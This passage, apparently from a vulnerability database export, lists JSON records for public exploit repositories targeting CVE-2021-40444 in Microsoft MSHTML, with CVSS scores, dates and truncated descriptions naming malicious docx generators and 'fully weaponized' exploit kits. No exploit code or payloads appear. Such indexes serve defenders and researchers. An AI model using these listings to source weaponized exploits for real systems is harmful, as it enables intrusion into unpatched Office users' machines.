"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 